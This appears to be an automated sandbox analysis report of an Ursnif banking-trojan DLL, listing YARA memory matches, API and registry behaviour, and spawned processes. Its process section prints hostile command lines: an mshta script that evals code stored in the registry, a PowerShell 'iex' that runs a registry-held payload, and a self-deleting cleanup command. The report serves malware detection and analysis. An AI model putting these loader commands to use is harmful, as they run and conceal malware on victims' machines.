Source: Yara match	File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		0_2_00F33FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_032E3FAB

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Uses 32bit PE files

Source: 2u2mgtylJy.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F32654		0_2_00F32654
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F37E30		0_2_00F37E30
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F34FA7		0_2_00F34FA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E4FA7		3_2_032E4FA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E7E30		3_2_032E7E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E2654		3_2_032E2654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_031B4FA7		6_2_031B4FA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_031B7E30		6_2_031B7E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_031B2654		6_2_031B2654
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0F2F0		31_2_00A0F2F0
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0B530		31_2_00A0B530
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A040B4		31_2_00A040B4
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A1508C		31_2_00A1508C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A1E0CF		31_2_00A1E0CF
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A07834		31_2_00A07834
Source: C:\Windows\System32\control.exe	Code function: 31_2_009FE008		31_2_009FE008
Source: C:\Windows\System32\control.exe	Code function: 31_2_009F3804		31_2_009F3804
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A03074		31_2_00A03074
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A1C874		31_2_00A1C874
Source: C:\Windows\System32\control.exe	Code function: 31_2_009F9074		31_2_009F9074
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A159A8		31_2_00A159A8
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0D9AC		31_2_00A0D9AC
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A14988		31_2_00A14988
Source: C:\Windows\System32\control.exe	Code function: 31_2_009FB1D8		31_2_009FB1D8
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0C9F0		31_2_00A0C9F0
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0C1D4		31_2_00A0C1D4
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0D150		31_2_00A0D150
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A132EC		31_2_00A132EC
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A1D2DC		31_2_00A1D2DC
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A08218		31_2_00A08218
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A09268		31_2_00A09268
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A1AA6C		31_2_00A1AA6C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A07278		31_2_00A07278
Source: C:\Windows\System32\control.exe	Code function: 31_2_009F6A68		31_2_009F6A68
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A1EB10		31_2_00A1EB10
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A06B1C		31_2_00A06B1C
Source: C:\Windows\System32\control.exe	Code function: 31_2_009F2B74		31_2_009F2B74
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A164F4		31_2_00A164F4
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A03C24		31_2_00A03C24
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A00474		31_2_00A00474
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0ED94		31_2_00A0ED94
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A1DD9C		31_2_00A1DD9C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A08DF4		31_2_00A08DF4
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A085CC		31_2_00A085CC
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A19524		31_2_00A19524
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0FD6C		31_2_00A0FD6C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A07D44		31_2_00A07D44
Source: C:\Windows\System32\control.exe	Code function: 31_2_009FC6F4		31_2_009FC6F4
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A16E34		31_2_00A16E34
Source: C:\Windows\System32\control.exe	Code function: 31_2_009F8628		31_2_009F8628
Source: C:\Windows\System32\control.exe	Code function: 31_2_009F779C		31_2_009F779C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0DFB8		31_2_00A0DFB8
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0179C		31_2_00A0179C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A13F08		31_2_00A13F08
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A09770		31_2_00A09770

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F322EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		0_2_00F322EC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F33C64 GetProcAddress,NtCreateSection,memset,		0_2_00F33C64
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F337E0 NtMapViewOfSection,		0_2_00F337E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F38055 NtQueryVirtualMemory,		0_2_00F38055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E37E0 NtMapViewOfSection,		3_2_032E37E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E3C64 GetProcAddress,NtCreateSection,memset,		3_2_032E3C64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		3_2_032E22EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E8055 NtQueryVirtualMemory,		3_2_032E8055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_031B22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		6_2_031B22EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_031B8055 NtQueryVirtualMemory,		6_2_031B8055
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0FAA8 NtSetInformationProcess,CreateRemoteThread,		31_2_00A0FAA8
Source: C:\Windows\System32\control.exe	Code function: 31_2_009F1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose,		31_2_009F1A58
Source: C:\Windows\System32\control.exe	Code function: 31_2_009F2B08 NtQueryInformationProcess,		31_2_009F2B08
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A2F00B NtProtectVirtualMemory,NtProtectVirtualMemory,		31_2_00A2F00B

PE file does not import any functions

Source: jdlmh2q4.dll.18.dr	Static PE information: No import functions for PE file found
Source: yg5i0oy3.dll.29.dr	Static PE information: No import functions for PE file found
Source: w34iw342.dll.20.dr	Static PE information: No import functions for PE file found
Source: 4z2qptpk.dll.33.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: 2u2mgtylJy.dll

Binary or memory string: OriginalFilenameSoon.dll8 vs 2u2mgtylJy.dll

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

PE file has an executable .text section and no other executable section

Source: 2u2mgtylJy.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'			Jump to behavior
